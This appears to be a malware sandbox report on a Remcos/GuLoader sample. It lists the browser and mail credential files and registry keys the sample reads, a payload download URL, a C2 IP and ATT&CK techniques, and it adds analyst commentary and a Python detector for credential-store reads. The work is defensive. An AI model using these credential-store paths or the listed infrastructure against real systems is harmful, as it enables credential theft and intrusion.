              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\~
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\y
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\*G
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\6
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\L
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, orders_PI 008-01.exe, 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\k
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerHD
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\1
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\p
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, logs.dat.3.dr | Binary or memory string: [Program Manager]
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\35
              Source: orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003538000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager3T\13
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B2933 cpuid | 3_2_344B2933
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 3_2_344B2264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter | 3_2_344B2264
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 6_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy | 6_2_004082CD
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Code function: 0_2_004034A2 EntryPoint,LdrInitializeThunk,SetErrorMode,GetVersion,lstrlenA,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,LdrInitializeThunk,CharNextW,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,LdrInitializeThunk,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,LdrInitializeThunk,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,ExitWindowsEx,LdrInitializeThunk,ExitProcess | 0_2_004034A2
              Source: C:\Users\user\Desktop\orders_PI 008-01.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Code function: EntryPoint, ESMTPPassword (6_2_004033F0)
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword (6_2_00402DB3)
Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword (6_2_00402DB3)
Source: Yara match  File source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
Source: Yara match  File source: Process Memory Space: orders_PI 008-01.exe PID: 7460, type: MEMORYSTR

The Chrome "Login Data"/"Web Data" and Firefox "key4.db" reads, the mail-client registry keys and the ESMTPPassword/PopPassword/SMTPPassword function names are the footprint of NirSoft-style password-recovery code that Remcos bundles for its browser and mail credential theft; the same memory regions carry www.nirsoft.net strings (see the URL table below). The reads are done from the orders_PI 008-01.exe image itself, not from a browser or mail process, which is the property a detection should key on.
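As an added example (not code from the report or from Joe Sandbox), the script below parses signature lines in exactly the form shown above and flags any process that reads password stores belonging to several different applications without being one of those applications. The input lines are constructed from this report plus two invented benign lines for contrast; the owner image names and the two-family threshold are assumptions to tune per environment.

```python
"""Flag processes that read credential stores they do not own.

Added example, not part of the Joe Sandbox report or its tooling. The input
lines are constructed in the shape of the report's "File opened" / "Key opened"
signature lines (plus two benign lines invented for contrast); the owner
process names are assumptions to be tuned per environment.
"""
import re
from collections import defaultdict

# Report-line format: "Source: <process>File opened: <path>", optionally with a
# trailing "Jump to behavior" link text. Process and action are not separated,
# so the process part is matched non-greedily up to the action keyword.
LINE_RE = re.compile(
    r"^Source:\s*(?P<proc>.+?)(?P<action>File opened|Key opened):\s*"
    r"(?P<target>.+?)(?:Jump to behavior)?$"
)

# Credential stores named in the report, grouped by the application family that
# legitimately reads them. Profile directories and user names are wildcards.
STORES = {
    "chrome": [
        r"\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$",
        r"\\Google\\Chrome\\User Data\\[^\\]+\\Web Data$",
    ],
    "firefox": [
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\key4\.db$",
        r"\\Mozilla\\Firefox\\Profiles\\[^\\]+\\places\.sqlite$",
        r"\\Mozilla\\Firefox\\profiles\.ini$",
    ],
    "outlook": [
        r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\Outlook\\OMI Account Manager\\Accounts$",
        r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles$",
    ],
    "windows-live-mail": [r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Live Mail$"],
    "incredimail": [r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities$"],
    "google-talk": [r"^HKEY_CURRENT_USER\\Software\\Google\\Google Talk\\Accounts$"],
    "paltalk": [r"^HKEY_CURRENT_USER\\Software\\Paltalk$"],
}

# Assumed legitimate reader per family (lower-case image names).
OWNERS = {
    "chrome": {"chrome.exe"}, "firefox": {"firefox.exe"}, "outlook": {"outlook.exe"},
    "windows-live-mail": {"wlmail.exe"}, "incredimail": {"incmail.exe"},
    "google-talk": {"googletalk.exe"}, "paltalk": {"paltalk.exe"},
}


def parse_line(line):
    """Return (process, action, target) for one signature line, or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("proc").strip(), m.group("action"), m.group("target").strip()


def store_family(target):
    """Map a file path or registry key to a credential-store family, or None."""
    for family, patterns in STORES.items():
        if any(re.search(p, target, re.IGNORECASE) for p in patterns):
            return family
    return None


def score_processes(lines, min_families=2):
    """Families touched per process, keeping processes that read at least
    `min_families` stores they do not own. A single family (a backup tool
    copying a Firefox profile, say) is too noisy to alert on by itself."""
    touched = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        process, _action, target = parsed
        family = store_family(target)
        if family is None:
            continue                       # e.g. IdentityCRL\Dynamic Salt: not a store we track
        image = process.rsplit("\\", 1)[-1].lower()
        if image in OWNERS[family]:
            continue                       # the store's own application reading its own data
        touched[image].add(family)
    return {p: sorted(f) for p, f in touched.items() if len(f) >= min_families}


SAMPLE_LINES = [  # constructed in the report's line format
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior",
    r"Source: C:\Users\user\Desktop\orders_PI 008-01.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior",
    # two benign lines, invented for contrast (not from the report)
    r"Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data",
    r"Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini",
]

if __name__ == "__main__":
    for image, families in score_processes(SAMPLE_LINES).items():
        print(f"{image}: reads {len(families)} credential stores it does not own: {', '.join(families)}")
```

On the constructed input only orders_PI 008-01.exe is reported (seven families); chrome.exe is skipped as the owner of the Chrome store, and explorer.exe touching a single Firefox file stays below the threshold. The same family map works against EDR file-read and registry-read telemetry once the line parser is swapped for the product's event fields.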

Remote Access Functionality

Source: C:\Users\user\Desktop\orders_PI 008-01.exe  Mutex created: \Sessions\1\BaseNamedObjects\Rmc-BHLA3T
Source: Yara match  File source: 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.3887015432.000000000358D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: 00000003.00000002.3879351770.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match  File source: Process Memory Space: orders_PI 008-01.exe PID: 8112, type: MEMORYSTR
Source: Yara match  File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

The "Rmc-" mutex prefix and the C:\ProgramData\remcos\ directory are Remcos defaults and make usable host indicators; note that the mutex string is set by the operator in the builder, so "Rmc-BHLA3T" identifies this build rather than Remcos in general, while the logs.dat file (the offline keylogger output, see the dropped-file listing) is the more stable artifact.
MITRE ATT&CK Matrix

Techniques with signature hits, listed per tactic. The number in brackets is the badge shown in the matrix cell, kept as displayed (values such as 112 or 228 are concatenated badges rather than a single count).

Execution: Native API [11]; Command and Scripting Interpreter [2]
Persistence: DLL Side-Loading [1]
Privilege Escalation: DLL Side-Loading [1]; Access Token Manipulation [1]; Process Injection [112]
Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Software Packing [1]; DLL Side-Loading [1]; Masquerading [12]; Virtualization/Sandbox Evasion [2]; Access Token Manipulation [1]; Process Injection [112]
Credential Access: OS Credential Dumping [1]; Input Capture [11]; Credentials in Registry [2]; Credentials In Files [1]
Discovery: System Time Discovery [1]; Account Discovery [1]; File and Directory Discovery [3]; System Information Discovery [228]; Security Software Discovery [241]; Virtualization/Sandbox Evasion [2]; Process Discovery [4]; Application Window Discovery [1]; System Owner/User Discovery [1]
Collection: Archive Collected Data [1]; Data from Local System [1]; Email Collection [1]; Input Capture [11]; Clipboard Data [2]
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [2]; Non-Standard Port [1]; Remote Access Software [1]; Non-Application Layer Protocol [2]; Application Layer Protocol [112]
Impact: System Shutdown/Reboot [1]

No hits: Reconnaissance, Resource Development, Initial Access, Lateral Movement, Exfiltration. The remaining matrix cells are the unhighlighted template entries of the matrix and are omitted here.
Antivirus detection

Initial sample:
  orders_PI 008-01.exe | 13% | ReversingLabs
  orders_PI 008-01.exe | 100% | Avira | HEUR/AGEN.1333748
Dropped files:
  C:\Users\user\AppData\Local\Temp\nslA6E2.tmp\System.dll | 0% | ReversingLabs
Unpacked PE files and domains (the next two categories in the report's section order): No Antivirus matches
URLs (from memory strings and dropped files):
  URL | Detection | Scanner | Label
  http://www.imvu.comr | 0% | URL Reputation | safe
  http://www.imvu.com | 0% | URL Reputation | safe
  https://deff.nelreports.net/api/report?cat=msn | 0% | URL Reputation | safe
  http://nsis.sf.net/NSIS_ErrorError | 0% | URL Reputation | safe
  http://geoplugin.net/json.gp | 0% | URL Reputation | safe
  https://login.yahoo.com/config/login | 0% | URL Reputation | safe
  http://www.ebuddy.com | 0% | URL Reputation | safe
  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO | 0% | Avira URL Cloud | safe
  https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59 | 0% | Avira URL Cloud | safe
  http://geoplugin.net/json.gp# | 0% | Avira URL Cloud | safe
  https://aefd.nelreports.net/api/report?cat=bingth | 0% | Avira URL Cloud | safe
  https://www.office.com/ | 0% | Avira URL Cloud | safe
  https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3 | 0% | Avira URL Cloud | safe
  http://www.nirsoft.net | 0% | Avira URL Cloud | safe
  https://aefd.nelreports.net/api/report?cat=wsb | 0% | Avira URL Cloud | safe
  http://212.162.149.38/LnGWkyvzVtM166.bin | 0% | Avira URL Cloud | safe
  https://aefd.nelreports.net/api/report?cat=bingaotak | 0% | Avira URL Cloud | safe
  http://212.162.149.38/LnGWkyvzVtM166.binV | 0% | Avira URL Cloud | safe
  https://www.google.com | 0% | Avira URL Cloud | safe
  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
  https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717 | 0% | Avira URL Cloud | safe
  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn | 0% | Avira URL Cloud | safe
  https://aefd.nelreports.net/api/report?cat=bingaot | 0% | Avira URL Cloud | safe
  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | 0% | Avira URL Cloud | safe
  https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269 | 0% | Avira URL Cloud | safe
  http://geoplugin.net/json.gpI | 0% | Avira URL Cloud | safe
  https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | 0% | Avira URL Cloud | safe
  http://geoplugin.net/json.gpeu | 0% | Avira URL Cloud | safe
  https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd | 0% | Avira URL Cloud | safe
  http://geoplugin.net/json.gp: | 0% | Avira URL Cloud | safe
  https://aefd.nelreports.net/api/report?cat=bingrms | 0% | Avira URL Cloud | safe
  https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
  https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8 | 0% | Avira URL Cloud | safe
  http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
  http://geoplugin.net/json.gpV | 0% | Avira URL Cloud | safe
  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a& | 0% | Avira URL Cloud | safe
  http://www.imvu.comata | 0% | Avira URL Cloud | safe

Reading this table: the variants with trailing characters (json.gpV, json.gpeu, json.gp:, imvu.comr, imvu.comata, .binV) are string-carving artifacts of the same URL, not distinct destinations. The only two URLs actually contacted are listed separately below; a 0% / "safe" verdict from URL reputation on http://212.162.149.38/LnGWkyvzVtM166.bin means only that the host is not yet listed, and should carry no weight given that the IP was contacted by a sample detected as GuLoader/Remcos.
Domains:
  Name | IP | Active | Malicious | Antivirus Detection | Reputation
  geoplugin.net | 178.237.33.50 | true | false | (none) | unknown
Contacted URLs:
  Name | Malicious | Antivirus Detection | Reputation
  http://212.162.149.38/LnGWkyvzVtM166.bin | false | Avira URL Cloud: safe | unknown
  http://geoplugin.net/json.gp | false | URL Reputation: safe | unknown
URLs found in memory and dropped files:
  Name | Source | Malicious | Antivirus Detection | Reputation
  https://www.office.com/ | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  http://geoplugin.net/json.gp# | orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://M365CDN.nel.measure.office.net/api/report?FrontEnd=AkamaiCDNWorldWide&DestinationEndpoint=LO | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f343d3a8731ffea490b8b5c3 | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  http://www.imvu.comr | orders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp; orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
  https://aefd.nelreports.net/api/report?cat=bingth | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59 | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  http://www.imvu.com | orders_PI 008-01.exe; orders_PI 008-01.exe, 00000007.00000003.1760994142.00000000007CD000.00000004.00000020.00020000.00000000.sdmp; orders_PI 008-01.exe, 00000007.00000003.1761352653.00000000007CD000.00000004.00000020.00020000.00000000.sdmp; orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
  https://aefd.nelreports.net/api/report?cat=wsb | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  http://www.nirsoft.net | orders_PI 008-01.exe, 00000005.00000002.1771684606.0000000000193000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://aefd.nelreports.net/api/report?cat=bingaotak | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://deff.nelreports.net/api/report?cat=msn | bhv2901.tmp.5.dr | false | URL Reputation: safe | unknown
  http://nsis.sf.net/NSIS_ErrorError | orders_PI 008-01.exe | false | URL Reputation: safe | unknown
  http://212.162.149.38/LnGWkyvzVtM166.binV | orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  http://geoplugin.net/json.gp: | orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | orders_PI 008-01.exe, 00000003.00000002.3908240272.0000000034480000.00000040.10000000.00040000.00000000.sdmp; orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://www.google.com | orders_PI 008-01.exe; orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=MIRA-WW-PH7&FrontEn | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://aefd.nelreports.net/api/report?cat=bingaot | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?f0f7e1407b69bd65640be717 | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  http://geoplugin.net/json.gpI | orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  http://geoplugin.net/json.gpeu | orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269 | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://07ab41ecf42bc570255fdecc8dea3fa9.azr.footprintdns.com/apc/trans.gif?5b3bec92835bc024c52f96dd | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://aefd.nelreports.net/api/report?cat=bingrms | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://www.google.com/accounts/servicelogin | orders_PI 008-01.exe | false | Avira URL Cloud: safe | unknown
  https://7da35b81493d6264eefb208fce0c5757.azr.footprintdns.com/apc/trans.gif?f92d19bcbba8eb1999dabbc8 | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown
  https://login.yahoo.com/config/login | orders_PI 008-01.exe | false | URL Reputation: safe | unknown
  http://geoplugin.net/json.gpV | orders_PI 008-01.exe, 00000003.00000002.3887015432.0000000003572000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  http://www.nirsoft.net/ | orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  http://www.imvu.comata | orders_PI 008-01.exe, 00000007.00000003.1760994142.00000000007CD000.00000004.00000020.00020000.00000000.sdmp; orders_PI 008-01.exe, 00000007.00000003.1761352653.00000000007CD000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
  http://www.ebuddy.com | orders_PI 008-01.exe; orders_PI 008-01.exe, 00000007.00000002.1761634918.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
  https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DestinationEndpoint=Edge-Prod-LAX31r5a& | bhv2901.tmp.5.dr | false | Avira URL Cloud: safe | unknown

Two groups dominate this list and neither is attacker infrastructure. The office.net, nelreports.net, footprintdns.com, netmon.azure.com, cxcs.microsoft.net and assets.msn.com entries come only from the dropped file bhv2901.tmp and are standard Microsoft client telemetry endpoints. The imvu.com, ebuddy.com, google.com/accounts/servicelogin and login.yahoo.com strings sit in the same process-7 image region (0x400000) as www.nirsoft.net, i.e. they are embedded strings of the bundled password-recovery tooling. What remains is the geoplugin.net geolocation lookup and the 212.162.149.38 download.
IPs:
  IP | Domain | Country | ASN | ASN Name | Malicious
  212.162.149.38 | unknown | Netherlands | 64236 | UNREAL-SERVERSUS | false
  162.251.122.106 | unknown | Canada | 64236 | UNREAL-SERVERSUS | true
  178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false

162.251.122.106 is the only endpoint the report marks malicious (it has no domain and was not reached over HTTP, consistent with the Remcos C2 channel). 212.162.149.38 served the .bin listed under contacted URLs, and both of these sit in the same AS64236. 178.237.33.50 is the public geoplugin.net service that Remcos queries for victim geolocation; it is shared with every other Remcos sample in the context tables below and is not, by itself, an indicator of compromise.
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1548262
Start date and time: 2024-11-04 09:26:06 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: orders_PI 008-01.exe
Detection: MAL
Classification: mal100.phis.troj.spyw.evad.winEXE@9/15@1/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 87%
• Number of executed functions: 158
• Number of non-executed functions: 340
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may be missing behavior information
• Report size exceeded maximum capacity and may be missing disassembly code
• Report size getting too big: too many NtQueryValueKey calls found
• Report size getting too big: too many NtReadVirtualMemory calls found
• Some HTTP raw data packets have been limited to 10 per session; view the PCAPs for the complete data
• VT rate limit hit for: orders_PI 008-01.exe

The run ended on timeout and hit several report-size caps, so the behavior listing above is a lower bound: a behavior absent from this report is unobserved, not ruled out, and the PCAP rather than the HTTP table is the authoritative record of network traffic.
Time | Type | Description
03:28:07 | API Interceptor | 5527092x Sleep call for process: orders_PI 008-01.exe modified

Over 5.5 million Sleep calls within the analysis window is a sleep-stalling loop; the analyzer shortened the calls so that execution continued, which is why the later credential-access and C2 behavior was observed at all. Under a sandbox without this interception the sample would likely have idled past the timeout.
IP context (other analysed samples that contacted the same IP; detection and threat name as reported):
  162.251.122.106
    KZ710-0038.exe | malicious | Remcos, GuLoader
